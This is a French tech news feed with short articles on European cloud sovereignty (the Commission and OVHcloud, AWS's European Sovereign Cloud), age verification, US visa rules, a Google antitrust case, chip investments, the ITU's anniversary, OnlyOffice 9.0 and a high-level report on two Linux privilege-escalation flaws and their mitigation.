↩ Accueil

Vue lecture

La Commission Européenne négocierait le passage de son cloud de Microsoft à OVHcloud

La Commission Européenne négocierait le passage de son cloud de Microsoft à OVHcloud

La Commission européenne serait entrée en négociations avec le français OVHcloud, en vue de faire migrer ses services cloud, actuellement hébergés chez Microsoft, vers une solution souveraine.

Le geste aurait une portée aussi stratégique que symbolique : d’après Euractiv, la Commission européenne a décidé d’abandonner Microsoft pour l’hébergement de ses services cloud. Le projet serait suffisamment avancé pour que Bruxelles ait commencé à sonder le marché. En l’occurrence, l’exécutif européen serait même entré en « négociations avancées » avec OVHcloud, sans qu’on sache quel est le périmètre concerné par cette potentielle migration.

Point de bascule ?

Selon Euractiv, qui affirme tenir ses informations de trois sources impliquées dans le dossier, la décision de la Commission européenne découlerait notamment de l’initiative de lobbying Eurostack, qui a réuni de nombreux industriels européens (du cloud ou des télécoms, mais aussi d’autres secteurs) autour d’un message de mobilisation en faveur d’une véritable souveraineté numérique européenne.

D’après l’une des sources citées par Euractiv, la Commission européenne considèrerait qu’elle peut jouer un rôle de modèle vis-à-vis des États membres et des différentes administrations qui lui sont rattachées. Elle aurait donc, conformément à l’appel porté par les représentants d’Eurostack, décidé de donner l’exemple.

L’incident relatif à la suppression du compte de messagerie d’un membre européen de la Cour pénale internationale, à la demande de l’administration Trump, aurait enfin joué un rôle dans la mise en branle de ce chantier, estime Euractiv. Microsoft a pour mémoire nié avoir coupé l’accès à la messagerie en question.

OVHcloud en pôle position ?

« Oui, c’est vrai. On bosse sur le sujet avec CE », a publiquement admis Octave Klaba, cofondateur et président d’OVHcloud.

« Des discussions sont effectivement en cours, avec la Commission comme avec d’autres institutions & organisations publiques et privées qui évaluent des projets de migration vers un cloud souverain. Ces échanges, de plus en plus nombreux avec les clients d’OVHcloud et les organisations traduisent une dynamique de fond, et nous positionnent comme l’une des alternatives pour un cloud souverain en Europe », commente de façon plus circonstanciée un porte-parole de l’entreprise, contacté par Next.

Des négociations avancées ne signifient toutefois pas qu’un accord soit trouvé. En l’occurrence, OVHcloud serait en pôle-position, mais Bruxelles entretiendrait aussi des discussions avec d’autres grands noms européens du secteur, parmi lesquels le français Scaleway (groupe iliad), l’allemand IONOS ou l’italien Aruba.

Nos confrères ne l’évoquent pas, mais Commission européenne pourrait aussi choisir de ménager la chèvre et le chou en se tournant vers des initiatives Bleu (Orange et Capgemini, avec Microsoft) et S3ns (Thales, avec Google), tous les deux en phase de qualification SecNumCloud. Elle pourrait ainsi « rester chez Microsoft » avec du « cloud de confiance ».

Quelle que soit l’issue des discussions et la décision finale de la Commission européenne, cette indiscrétion éclaire d’un jour nouveau les grandes promesses formulées ces dernières semaines par les géants américains du cloud en direction de l’Europe.

Amazon Web Services a par exemple formulé début juin de nouveaux engagements en matière de cloud public, tandis que Microsoft a été encore un cran plus loin, avec le lancement d’un programme Sovereign Private Cloud, censé garantir « que les données des clients restent en Europe, sous la loi européenne, avec des opérations et un accès contrôlés par le personnel européen, et que le chiffrement est sous le contrôle total des clients ».

  •  

Réseaux sociaux : Clara Chappaz réitère vouloir introduire une vérification d’âge

ID please
Réseaux sociaux : Clara Chappaz réitère vouloir introduire une vérification d’âge

À l’Assemblée nationale, Clara Chappaz a de nouveau défendu l’interdiction des réseaux sociaux pour les plus jeunes, sujet régulièrement porté par Emmanuel Macron.

Comme prévu, Clara Chappaz a défendu la vérification de l’âge à l’entrée des réseaux sociaux face à la Commission d’enquête parlementaire sur les effets psychologiques de TikTok sur les mineurs.

La ministre déléguée chargée du numérique et de l’intelligence artificielle a porté régulièrement le sujet au fil des derniers mois, notamment au cours de la semaine de sensibilisation 10 jours sans écran ou en reprenant la possibilité de classer le réseau social X aux côtés des plateformes pornographiques, dans la mesure où il permet depuis 2024 de diffuser des contenus interdits aux mineurs.

Devant les députés, de même que plusieurs experts et associations auditionnés dans les jours précédents, elle a rappelé la tendance des réseaux sociaux à accroître l’anxiété des plus jeunes et à participer au développement de troubles alimentaires ou du sommeil. Avant d’avancer que l’impact de ces plateformes sur le développement cognitif et émotionnel des adolescents pourrait coûter « 1 à 2 points de PIB ».

« Les solutions techniques existent »

Évoquant sa saisine de l’Arcom et de la Commission européenne, pour lutter contre la tendance SkinnyTok en avril dernier, Clara Chappaz relève que la mobilisation de membre du gouvernement au cas par cas n’est pas une solution viable. L’Union européenne compte 450 millions d’européens, ce qui rend ce niveau supranational le mieux à même de faire pression sur les plateformes pour que celles-ci « prennent leurs responsabilités », indique-t-elle aux députés, avant de préciser qu’elle est désormais suivie par 13 pays sur la question de la vérification d’âge.

Déjà poussée du côté des sites pornographiques – la justice a suspendu l’arrêté ce 16 juin, la ministre indique que l’État se pourvoira en cassation –, la vérification d’âge est une préoccupation majeure d’Emmanuel Macron. « Pour le président, il n’y aucun problème dans la société, tout est exacerbé par les réseaux sociaux », tacle même une représentante de plateforme auprès de Politico.

À l’Assemblée nationale, Clara Chappaz indique, elle, que « la commission connaît très bien notre position » : pousser les réseaux sociaux à développer les technologies de vérification d’âge de l’utilisateur qui permettront de bloquer l’accès aux plus jeunes dans le respect du règlement européen sur les services numériques (DSA), ou se tourner vers des tiers de confiance. « Les solutions techniques existent », insiste-t-elle, citant aussi bien France Identité, sur suggestion d’un député, que Docaposte ou la « quinzaine d’acteurs français » venus la solliciter pour proposer leurs services à Viva Tech et au fil des mois.

Surtout, selon un document de travail obtenu par Euractiv, la France participe à pousser la solution d’un « Kids Wallet » dédié à vérifier l’âge des mineurs à l’entrée des plateformes. « Nous nous sommes portés volontaires pour être pays pilote de cette solution, qui sera open source et protégera l’anonymat », indique Clara Chappaz aux députés.

Comparant à l’interdiction de consommer de l’alcool avant 18 ans, elle précise : « l’objet n’est pas d’interdire pour interdire, mais de protéger ». « Le numérique n’est pas un truc de geek », déclare-t-elle encore. Autrement dit, le sujet ici débattu est politique, sujet à débat, et en cela « compliqué ». Or, pour le gouvernement, « ce n’est plus entendable de se cacher derrière un argument technique, surtout quand on est une entreprise du numérique ».


Interdire en ligne ce qui l’est hors ligne

Quelle responsabilité des producteurs de contenu ? Sur ce sujet, la ministre rappelle qu’un enfant sur cinq pense que les pyramides ont été construites par des extraterrestres pour souligner les enjeux de lutte contre la désinformation.

Les députés s’y sont aussi frottés lors des auditions mouvementées de cinq influenceurs controversés, le 11 juin dernier. D’une manière ou d’une autre, tous avaient rejeté la responsabilité de l’accès à leurs contenus sur la plateforme qu’ils utilisent (parmi d’autres). « Si des élèves de CE2 (…) accèdent à cette plateforme, c’est un problème de contrôle parental et de responsabilité de TikTok, pas de la mienne » avait ainsi lancé l’acteur porno Adrien Laurent, mieux sous le nom d’AD Laurent, aux députés.

L’influenceur masculiniste Alex Hitchens, de son vrai nom Isac Mayembo, a de son côté appelé à l’interdiction de TikTok qu’il a qualifié de « néfaste », et où « ce qui fonctionne le mieux, c’est le contenu qui choque ». Agacé par des questions sur ses propos sexistes, il a ensuite raccroché brutalement au nez des parlementaires.

Le président de la Commission Arthur Delaporte (Socialistes) a regretté auprès du Figaro avoir affaire à « des gens qui sont arrivés ici en pensant qu’ils étaient dans un match », sans considération pour la « légitimité institutionnelle liée à [l’]élection » des députés. Dans La Croix, le sociologue Vincenzo Susca décrivait carrément la fuite d’Alex Hitchens comme une « déclaration de souveraineté (…) d’un pouvoir qui ne reconnaît plus les règles de l’ancien monde » — au contraire, depuis une semaine, l’influenceur tire un maximum de son coup d’éclat, multipliant les contenus le remettant en scène.

À l’Assemblée nationale, Clara Chappaz a de son côté appelé à « sortir de ce ping-pong dans lequel les acteurs se renvoient la balle ». Elle a rappelé au passage que la liberté d’expression n’était pas définie de la même manière dans les pays de fabrication des plus grandes plateformes numériques et en Europe. Évoquant les discours de haine, elle a souligné l’esprit des textes européens : « Les propos qui ne sont pas autorisés hors ligne ne le sont pas non plus en ligne. »

  •  

☕️ Visa pour les États-Unis : étudiants et chercheurs devront rendre publics leurs réseaux sociaux

Visa pour les États-Unis : étudiants et chercheurs devront rendre publics leurs réseaux sociaux

Le Département d’État des États-Unis, chargé des affaires étrangères, a annoncé mercredi 18 juin une nouvelle politique le contrôle et la vérification des demandes de visa qui inclut maintenant officiellement la présence en ligne de certains visiteurs temporaires catégorisés comme « non-immigrants ».

Cela concerne les catégories F, M et J, ce qui correspond aux étudiants et aux visiteurs en échange dont notamment les enseignants, professeurs et chercheurs, mais aussi les personnes faisant partie de programmes « au pair ».

S’ils veulent obtenir leur visa, ceux-ci devront régler les paramètres de confidentialité de tous leurs profils de médias sociaux sur « public », « afin de faciliter le contrôle » selon l’autorité étasunienne.

En avril dernier, on apprenait qu’une équipe spéciale du Département de la Sécurité intérieure des États-Unis (DHS) utilise un outil pour analyser les messages postés par les étudiants étrangers qui étudient aux États-Unis afin de trouver des motifs potentiels de révocation de leur visa.

Un drapeau américain flotte dans un ciel gris.
  •  

☕️ Google vs Europe : vers une confirmation de l’amende de 4,1 milliards d’euros ?

On rembobine le temps jusqu’au 18 juillet 2018 quand la Commission européenne infligeait à Google une amende de près de 4,343 milliards d’euros pour avoir « abusé de sa position dominante en imposant aux fabricants d’appareils mobiles et aux opérateurs de réseaux mobiles des restrictions contractuelles anticoncurrentielles, dont certaines remontaient au 1ᵉʳ janvier 2011 ».

Quelques mois plus tard, Google a fait appel de cette amende, « avec un succès limité », indique la Cour de justice de l’Union européenne. En effet, en septembre 2022, le Tribunal « a (uniquement) annulé la décision en ce qui concerne la règle de partage des recettes et a fixé le montant de l’amende à 4,124 milliards d’euros ».

Drapeaux de l’Union européenne

Google n’en est pas resté là et a formé un pourvoi devant la Cour. Lors d’une audience au début de l’année, l’avocat de Google (Alfonso Lamadrid) affirmait que les accords avec les fabricants de smartphones « n’ont pas restreint la concurrence, ils l’ont encouragée ». De son côté, la Commission européenne les a considérés comme anticoncurrentiels.

Le verdict n’est pas encore rendu, mais l’avocate générale (Juliane Kokott) propose à la Cour de « rejeter le pourvoi formé par Google et de confirmer ainsi l’arrêt du Tribunal », soit l’amende de 4,124 milliards d’euros.

Voici les explications : « D’une part, l’appréciation des faits et des preuves à laquelle a procédé le Tribunal ne peut en principe être contestée devant la Cour. D’autre part, les arguments juridiques invoqués par Google ne sont pas fondés ». 2 - 0 pour l’Europe.

« S’agissant en particulier du groupement du Play Store avec Google Search et Chrome, elle estime que,
contrairement à la thèse de Google, le Tribunal n’était pas tenu, pour prouver l’existence d’un abus, d’exiger de la Commission qu’elle analyse la situation concurrentielle qui aurait prévalu en l’absence du comportement incriminé
». 3 - 0, le match est plié pour l’avocate générale. Le point bonus va aussi à l’Europe : « le Tribunal n’a commis aucune erreur dans le nouveau calcul du montant de l’amende ».

La victoire finale n’est pas encore acquise pour autant, comme le rappelle le communiqué : « Les conclusions de l’avocat général ne lient pas la Cour de justice. La mission des avocats généraux consiste à proposer à la Cour, en toute indépendance, une solution juridique dans l’affaire dont ils sont chargés. Les juges de la Cour commencent, à présent, à délibérer dans cette affaire. L’arrêt sera rendu à une date ultérieure ».

  •  

☕️ Texas Instruments annonce 60 milliards de dollars d’investissements aux États-Unis

Texas Instruments (15,64 milliards de dollars en 2024, environ 34 000 employés dans le monde) a annoncé mercredi un plan d’investissement de 60 milliards de dollars consacré au renforcement de ses capacités de production de semi-conducteurs aux États-Unis.

« En collaboration avec l’administration Trump et en s’appuyant sur son héritage de près de 100 ans, TI étend sa capacité de fabrication aux États-Unis pour répondre au besoin croissant de semi-conducteurs qui feront progresser les innovations critiques, des véhicules aux smartphones en passant par les centres de données », indique le groupe dans un communiqué.

Outre le gouvernement Trump, Texas Instruments (TI) explique que ces investissements se font aussi en partenariat avec ses grands clients américains tels que Apple, Ford, Medtronic ou SpaceX, mais aussi en collaboration avec NVIDIA pour des développements conjoints autour des datacenters et des infrastructures dédiées à l’IA.

Ces 60 milliards de dollars sont censés contribuer à la création de nouvelles usines ainsi qu’à l’extension d’unités de production intégrées aux trois complexes industriels dont dispose déjà TI sur le sol américain, à savoir Sherman et Richardson, au Texas, et Lehi, dans l’Utah. Le méga-site de Sherman concentrerait à lui seul quelque 40 milliards de dollars d’investissements, pour aboutir à un total de quatre usines.

Le site de Sherman héberge déjà une première unité, SM1, dont la mise en service est prévue en 2025 et l’enveloppe extérieure d’une deuxième usine, SM2 – crédit TI

Si ambitieux qu’il soit, le programme d’investissement dévoilé par l’entreprise accuse toutefois quelques lacunes, à commencer par un calendrier précis. Il reprend par ailleurs des promesses déjà formulées par TI en août 2024. Dans le cadre du Chips Act, l’administration Biden avait en effet accordé à la firme 1,6 milliard de dollars de subventions, 3 milliards de dollars de crédits et 8 milliards de dollars de crédit d’impôt prévisionnel pour soutenir un plan d’investissement qui, déjà, prévoyait d’injecter 18 milliards de dollars au Texas et dans l’Utah.

L’annonce de TI suit de quelques jours les promesses encore plus pharaoniques formulées par son compatriote Micron, spécialiste de la mémoire vive, avec cette même logique d’annonces réitérées, mais portant sur des enveloppes toujours plus conséquentes.

Micron, qui promettait d’investir 40 milliards de dollars sur environ dix ans dans ses capacités de production aux États-Unis en 2022, parle en effet maintenant d’une enveloppe globale de 200 milliards de dollars (150 milliards pour des usines et 50 milliards pour des capacités de R&D). « Ces investissements sont conçus pour permettre à Micron de répondre à la demande attendue du marché, de maintenir sa position et de soutenir son objectif de produire 40 % de sa DRAM aux États-Unis », clame la société.

  •  

☕️ Sur Linux, deux failles peuvent s’enchainer pour obtenir un accès root

Les chercheurs de la société de sécurité Qualys ont publié des informations sur deux failles, CVE-2025-6018 et CVE-2025-6019. Leur exploitation conjointe permet d’obtenir des droits root, donc complets sur le système.

CVE-2025-6018 réside dans la configuration de Pluggable Authentication Modules (PAM) d’openSUSE Leap 15 et de SUSE Linux Enterprise 15. Elle permet à un attaquant local sans privilège d’obtenir les droits « allow_active » d’un utilisateur connecté localement. Pas besoin pour l’attaquant d’être physiquement présent : une session SSH distante fonctionne aussi.

Pour comprendre la faille, il faut savoir que PAM est chargé de contrôler comment les utilisateurs s’authentifient et démarrent les sessions Linux. La faille réside dans une erreur de configuration. Et quelle erreur, puisque PAM traite toute connexion locale comme si la personne était physiquement présente devant la console. Dans le cas présent, l’exploitation réussie de cette faille autorise celle de la seconde.

Vitrée brisée

Celle-ci, CVE-2025-6019, se situe dans la bibliothèque libblockdev et peut être exploitée via le service (daemon) udisks pour obtenir les droits root. Contrairement à la première faille, cette vulnérabilité peut être exploitée dans toutes les distributions où le service udisks est activé par défaut, autrement dit la grande majorité. Le service établit un pont entre les droits allow_active et root, permettant de décrocher le précieux sésame, l’attaquant obtenant alors carte blanche.

« Ces exploits modernes « local-to-root » ont réduit le fossé entre un utilisateur connecté ordinaire et une prise de contrôle complète du système. En enchaînant des services légitimes tels que les montages en boucle udisks et les bizarreries PAM/environnement, les attaquants qui possèdent une interface graphique ou une session SSH active peuvent franchir la zone de confiance allow_active de polkit et prendre le contrôle du système en quelques secondes. Rien d’exotique n’est nécessaire : chaque lien est préinstallé sur les distros Linux courantes et leurs versions serveur », indique Saeed Abbasi, responsable chez Qualys.

Les correctifs nécessaires sont en cours de diffusion dans un nombre croissant de distributions Linux. Il est donc recommandé de vérifier leur disponibilité. Les chercheurs pointent une méthode en attendant : dans les règles de Polkit, modifier « org.freedesktop.udisks2.modify-device » pour qu’une authentification administrateur soit systématiquement réclamée. Le paramètre « allow_active » doit alors être modifié en « auth_admin ».

  •  

160 ans de télécoms : de la Tour Eiffel à l’espace, en passant par le Titanic

Bah et les pyramides alors ?
160 ans de télécoms : de la Tour Eiffel à l’espace, en passant par le Titanic

Dans un monde toujours plus connecté et qui dépasse même les frontières de notre Terre, il est indispensable d’avoir une coopération internationale pour la gestion des fréquences. C’est le rôle de l’UIT des Nations unies. Elle fête ses 160 ans et a donc vu l’essor de toutes les communications modernes.

Le 17 mai 1865, à Paris, 20 pays signaient une convention créant l’Union Internationale Télégraphique, l’ancêtre de l’Union internationale des télécommunications (IUT). C’est « la plus ancienne agence des Nations Unies », rappelle l’ANFR. L’IUT ajoute que la « République française a joué un rôle central dans sa création ».

Du télégraphe à la télécommunication et au spatial

Les articles 4 et 5 résonnent encore aujourd’hui : « Les Hautes Parties contractantes reconnaissent à toutes personnes le droit de correspondre au moyen des télégraphes internationaux […] Elles s’engagent à prendre toutes les dispositions nécessaires pour assurer le secret des correspondances et leur bonne expédition ». La convention originale est disponible ici sous forme de PDF. Les comptes rendus des autres conventions se trouvent par là.

Il y a 160 ans, l’enjeu était « d’interconnecter les réseaux télégraphiques ». On remplace télégraphiques par télécommunications et l’idée reste la même aujourd’hui.

L’Agence nationale des fréquences confirme :

« Les problématiques traitées au sein du secteur des radiocommunications de l’UIT sont finalement assez proches de celles des débuts : recherche d’harmonisation, faciliter l’innovation, définition des règles de coexistence dans le respect de la souveraineté des pays dans la gestion de leurs fréquences, accès équitable ».

Signe d’un changement d’époque tout de même, la prochaine Conférence mondiale des radiocommunications (ou CMR) sera consacrée « à 80 % au spatial ». Elle se déroulera en 2027. Les CMR se tiennent en général tous les trois ou quatre ans.

La Tour Eiffel comme terrain de jeu

L’Union internationale des télécommunications explique que si la Tour Eiffel, est toujours en place, c’est « en grande partie grâce à l’émergence de la radio ». Elle a été construite pour l’Exposition universelle de 1889, soit 34 ans après la signature de la convention, mais celle qui est désormais l’emblème de la France a servi dès le début des années 1900 à des expérimentations scientifiques, notamment dans les radiocommunications : « En 1908, les émissions atteignaient jusqu’à 6 000 kilomètres ».

C’est à la même période que la première Convention radiotélégraphique internationale est lancée, en 1906, en parallèle de la Convention télégraphique internationale. En 1932, les deux conventions fusionnent pour former la Convention internationale des télécommunications. Elle s’occupe de la télégraphie, de la téléphonie et des radiocommunications.

« Le désastre du Titanic aurait pu être évité »

La première convention radiotélégraphique « portait essentiellement sur le service maritime pour éviter les brouillages, donner la priorité à la détresse et à la sécurité, et assurer l’interopérabilité entre les systèmes », explique Éric Fournier de l’ANFR. Elle a aussi « imposé comme signal de détresse le SOS ».

Il ajoute une petite anecdote : « tout n’était pas parfait, le désastre du Titanic [qui a fait naufrage en 1912, ndlr] aurait pu être évité si l’opérateur radio avait écouté les messages d’alerte aux iceberg, plutôt que de privilégier les correspondances publiques. Et les secours auraient pu arriver beaucoup plus vite s’il y avait eu des obligations d’emport des équipements radio et de veille sur tous les navires ».

Les conférences ultérieures en « ont en tiré les leçons ». C’est courant comme manière de faire : en cas d’incident, les causes sont recherchées et identifiées afin d’éviter que cela ne se reproduise. C’est même une règle d’or dans l’aviation et on aimerait que ce soit aussi le cas dans le numérique. En cas de grosse panne ou bug, publier un post mortem détaillé permet d’informer les autres acteurs du secteur qui peuvent ainsi vérifier s’ils peuvent être concernés et, le cas échéant, prendre des mesures.

Protéger la radioastronomie, accompagner la téléphonie

En 1963, la conférence a pour la première fois attribué une bande de fréquence exclusive pour la radioastronomie : les 1,4 GHz (pour l’hydrogène). Aujourd’hui encore, la guerre est féroce sur les ondes entre les scientifiques et les intérêts financiers des grandes sociétés et des pays.

« Pas mal de gens pensent que les bandes passives [aucun service actif n’est autorisé, ndlr] prennent du spectre et que ce serait pas mal qu’elles soient utilisées par des émetteurs actifs […] Elles sont très convoitées, on a de plus en plus de mal à les défendre, c’est de plus en plus compliqué […] Le spectre est de plus en plus rare et difficile d’accès », résumait Thibault Caillet, expert en ingénierie du spectre à l’ANFR.

Pour Éric Fournier, « une autre réussite de l’IUT a été d’accompagner l’essor des communications mobiles avec l’harmonisation depuis plus de 30 ans des fréquences, mais aussi des technologies IMT » ou International Mobile Telecommunications.

2,6 milliards de personnes toujours pas connectées

À l’occasion de cet anniversaire et de la Journée mondiale des télécommunications et de la société de l’information (fixée au 17 mai), les Nations Unies affirment que « combler le fossé numérique entre les hommes et les femmes ouvre des perspectives à tous ».

L’IUT rappelle de son côté que « sur les 2,6 milliards de personnes qui ne sont toujours pas connectées, la majorité sont des femmes et des filles ». « À l’échelle mondiale, 70 % des hommes utilisent Internet, contre 65 % des femmes », indique l’Union dans son bilan.

Il y a aussi de fortes disparités entre les continents. L’Afrique est sans surprise en dernière position avec seulement 31 % de femmes connectées et 43 % des hommes. En Europe, nous sommes à respectivement 90 et 92 %.

  •  

☕️ Sam Altman veut qu’une « fraction significative » de l’énergie produite sur Terre soit dédiée à l’IA

Si l’humanité émet encore 130 gigatonnes de carbone dans l’atmosphère, l’objectif de réchauffement à 1,5 °C figé en 2015 lors de la COP 21 sera officiellement caduc, annoncent une soixantaine de chercheurs dans la revue Earth System Science Data.

Loin de prendre en compte cet échec inquiétant, le patron d’OpenAI Sam Altman estimait la semaine passée que « théoriquement, à un moment, on peut envisager qu’une fraction significative de l’énergie sur Terre devrait être consacrée à l’exécution de calculs d’IA. Et peut-être allons-nous y parvenir. »

L’homme d’affaires a formulé ce vœu en réponse à la directrice générale d’AMD Lisa Su, qui faisait référence aux récentes pannes de ChatGPT.

consommation de l'ia

La vision de Sam Altman était formulée sans considération particulière pour la production d’énergie, très carbonée aux États-Unis et dans la plupart des régions du monde, ni pour les autres enjeux environnementaux posés par la construction des grands modèles de langages et de l’infrastructure qui leur permet de fonctionner.

Pour en savoir plus sur ces sujets, écoutez notre série audio Écosystème sur votre plateforme de podcast préférée.

  •  

☕️ OnlyOffice 9.0 Docs modernise son interface

Nouvelle version majeure pour la suite bureautique open source. Rappelons qu’OnlyOffice est proposé en deux variantes. La première, Docs, est une version hébergée sur un serveur et donnant accès aux applications web sur des postes clients. L’autre est la suite logicielle classique à installer (Windows, macOS ou Linux), qui récupère les nouveautés de Docs avec un léger décalage.

C’est bien la version 9.0 de Docs qui a été annoncée hier. Les nouveautés y sont nombreuses, dont une modernisation de l’interface. La suite en a fait très rapidement un argument, l’équipe étant consciente que l’interface datée de LibreOffice, presque rébarbative, était une opportunité. OnlyOffice reprend ainsi largement ce que l’on connait dans la suite Office de Microsoft, avec notamment les rubans repliables. Les nouveaux thèmes se nomment Modern Light et Modern Dark et peuvent être changés dans les options.

L’édition des PDF fait également un grand bond. La modification peut maintenant se faire en collaboration temps réel, annonce l’entreprise. On peut réarranger les pages du document par des glisser-déposer dans la colonne des vignettes, ou encore les dupliquer par les raccourcis classiques Ctrl + C et Ctrl + V.

OnlyOffice Docs 9.0 est aussi la première version de la suite à proposer des fonctions basées sur l’IA. Elle l’utilise pour quelques outils, dont l’extraction de texte dans les PDF et une meilleure automatisation des macros et formules dans les feuilles de calcul.

Parmi les autres nouveautés, citons un bouton d’accès rapide pour les bordures de paragraphe et de meilleurs contrôles de contenus dans le traitement de texte, la prise en charge des boutons personnalisés via des plugins, un support amélioré des langues s’écrivant de droite à gauche, ou encore l’ajout d’un dictionnaire pour la vérification orthographique en arabe.

Signalons enfin le support de plusieurs nouveaux formats de fichiers, dont le Markdown (.md). OnlyOffice Docs 9.0 peut lire et modifier également les fichiers Visio (.vsd et .vsdx), OpenDocument Graphics (.odg) et Excel Binary (.xslb).

Les versions 9.0 des conteneurs peuvent être récupérées depuis le site officiel. La version Enterprise, la plus complète, réclame une licence payante. La version Community, sans support dédié, est gratuite. Les applications natives, elles, devraient arriver dans les semaines qui viennent.

  •  

☕️ Donald Trump va encore accorder 90 jours de sursis à TikTok

« Le président Trump signera un décret supplémentaire cette semaine pour permettre à TikTok de continuer à fonctionner », a affirmé dans un communiqué Karoline Leavitt, expliquait CNN mardi 17 juin. Elle a ajouté : « comme il l’a dit à plusieurs reprises, le président Trump ne veut pas que TikTok sombre. Cette extension durera 90 jours, que l’administration passera à travailler pour s’assurer que cet accord est conclu afin que le peuple américain puisse continuer à utiliser TikTok avec l’assurance que leurs données sont sûres et sécurisées ».

L’application chinoise aurait dû fermer ses portes aux États-Unis il y a tout juste cinq mois, après le vote d’une loi obligeant ByteDance à vendre TikTok, sous peine d’interdiction de l’application sur le sol des États-Unis. Cette décision a même été confirmée par la Cour suprême.

dessin satirique de Flock

Mais depuis son retour au pouvoir, et alors qu’en 2020 il faisait partie de ceux qui réclamaient l’interdiction de TikTok sur le sol étasunien, Donald Trump repousse encore et encore la date limite du deal.

Selon CNN, un accord a failli être trouvé en avril dernier, mais les annonces de Donald Trump sur les droits de douane sur les produits Chinois l’aurait fait capoter. La date limite du report signé en avril par le président étasunien était pour aujourd’hui, le 19 juin.

  •  

AWS bâtit un mur pour son offre « souveraine » européenne, mais le Cloud Act demeure

Intrication quantique
AWS bâtit un mur pour son offre « souveraine » européenne, mais le Cloud Act demeure

Amazon Web Services tenait cette semaine sa conférence re:Inforce. L’un de ses objectifs est de rassurer l’Europe en insistant et détaillant ses annonces sur la souveraineté technique via des offres dédiées. Une philosophie différente de Microsoft sur le sujet, mais qui présente la même faiblesse centrale sur le cloud public : la perméabilité aux lois américaines.

Début juin, AWS a présenté une nouvelle offre « souveraine » pour l’Europe. Estampillée logiquement European Sovereign Cloud, elle pousse des critères exclusifs au Vieux continent. alors que Microsoft a dégainé sa propre arme dans ce domaine, en visant à la fois le cloud public, le cloud privé et les installations hybrides sur site, AWS se concentre sur le cloud public.

La société tient depuis lundi sa conférence re:Inforce, centrée sur la sécurité. Si elle est dédiée aux offres cloud de l’entreprise et à la séduction des acteurs qui n’auraient pas encore gouté au cloud d’Amazon, AWS en a profité pour revenir sur son European Sovereign Cloud et son fonctionnement, apportant au passage quelques détails.

De quoi parle-t-on ?

L’European Sovereign Cloud est un cloud public, physiquement et logiquement séparé des autres régions AWS. La conséquence la plus directe est que l’offre n’existe pas encore. Contrairement à Microsoft qui va adapter petit à petit ses centres dans son initiative Sovereign Public Cloud, AWS part directement sur de nouvelles infrastructures.

La première région sera implantée dans le Brandebourg, en Allemagne, avec un investissement de 7,8 milliards d’euros jusqu’en 2040. L’infrastructure doit être prête d’ici la fin de l’année et sera dirigée par Kathrin Renz, vice-présidente allemande d’AWS Industries. Les deux autres membres de la direction (DPO et RSSI) seront également des citoyens européens résidant au sein de l’Union.

Cette infrastructure est donc pensée pour l’Europe, sans dépendance vis-à-vis d’une autre infrastructure non-européenne. Le contrôle et l’exploitation doivent être 100 % européens, assurés par des « résidents européens », y compris l’accès aux centres de données, l’assistance technique et le service client.

Par défaut, tous les outils de gestion des coûts, la facturation et l’interface de la console seront paramétrés en euros. Rappelons que les États-Unis peuvent engager des poursuites sur la base de transactions effectuées en dollars. C’est l’un des aspects de l’extraterritorialité du droit américain. Pour les clients le souhaitant, l’euro pourra être remplacé par une autre devise par défaut.

L’offre d’Amazon aura sa propre infrastructure réseau, avec une connectivité dédiée, via Direct Connect. Le DNS d’Amazon, Route 53, sera également présente sous une forme spécifique et autonome. L’European Sovereign Cloud aura aussi sa propre autorité de certification européenne « racine ». Ces trois éléments seront disponibles au lancement du premier centre. Cette offre européenne s’accompagnera en outre d’un centre d’opérations de sécurité (SOC) dédié.

Lors de son annonce, Amazon mettait largement en avant son « étroite collaboration » avec le BSI, l’équivalent allemand de l’ANSSI. Au moment de lister les certifications de l’European Sovereign Cloud, on retrouvait ainsi des normes comme ISO/IEC 27001:2013, les rapports SOC 1/2/3 ou encore la qualification C5 du BSI. Rappelons que si C5 est la plus haute qualification de sécurité du BSI, elle ne tient pas compte du caractère extraterritorial des législations non-européennes. Les écarts de vision entre l’Allemagne et la France ont notamment été au cœur des chambardements dans la genèse de la direction EUCS, aujourd’hui au point mort.

Stratégie de la forteresse

Lors de la conférence re:Inforce, Amazon Web Services n’a rien annoncé de véritablement nouveau. Toutefois, l’entreprise s’est servie de son évènement pour faire intervenir des experts sur le sujet, renforcer son message en revenant notamment sur certains points, particulièrement la sécurité.

Par exemple, l’authentification à facteurs multiples sera obligatoire et activée par défaut pour l’ensemble des comptes root des clients. On a également vu des annonces sur l’extension du service de détection des menaces Amazon GuardDuty aux environnements de conteneurs EKS, ou encore une nouvelle version du Security Hub pour rassembler et prioriser les alertes de sécurité.

Si Amazon communique autant, c’est que l’entreprise n’avait proposé encore aucune solution concrète en matière de souveraineté. Là où Google et Microsoft commercialisaient déjà des produits dédiés. Microsoft vient d’ailleurs de renforcer son offre.

AWS présente ainsi en grande pompe sa forteresse numérique à destination de l’Europe. Toute la structure juridique est européenne, avec une maison mère et trois filiales, toutes constituées en Allemagne. Amazon vante même la création d’un conseil consultatif indépendant, qui pourra embarquer jusqu’à trois employés européens d’Amazon et au moins un(e) citoyen(ne) européen(ne) sans affiliation avec Amazon. Ce conseil aura l’obligation légale « d’agir dans le meilleur intérêt de l’European Sovereign Cloud », même si on ne sait ce que cela signifie réellement.

AWS le dit et le redit : les décisions sont prises en Europe, par des Européens et selon le droit européen. L’entreprise bâtit un mur pour isoler sa nouvelle offre du reste du monde. Mais aussi haut que soit le mur, l’intrication juridique est toujours présente.

L’éternel problème des lois américaines

Car si AWS insiste sur la souveraineté, il faut encore s’entendre sur la définition du mot. Si l’on considère qu’elle définit une infrastructure européenne gérée par une entité européenne, alors l’offre d’Amazon est techniquement souveraine. Mais si on l’examine à travers le prisme du « cloud de confiance », ça coince.

Même si l’European Sovereign Cloud désigne des structures isolées du reste du monde, opérée par des citoyens européens et gérée par une entité européenne, celle-ci est une filiale d’Amazon Web Services, une société de droit états-unien. La maison mère est soumise à plusieurs lois à portée extraterritoriale, dont les deux plus connues : le Cloud Act et le FISAA.

De fait, si la justice américaine devait valider un mandat de perquisition, Amazon n’aurait d’autre choix que d’y obéir. Elle peut contester la validité de ce mandat, sans garantie d’arriver à repousser la demande. Microsoft s’est engagée à contester systématiquement ces demandes. Mais ni l’une ni l’autre ne peuvent assurer que personne en dehors de l’Europe n’aura un jour accès à des données européennes.

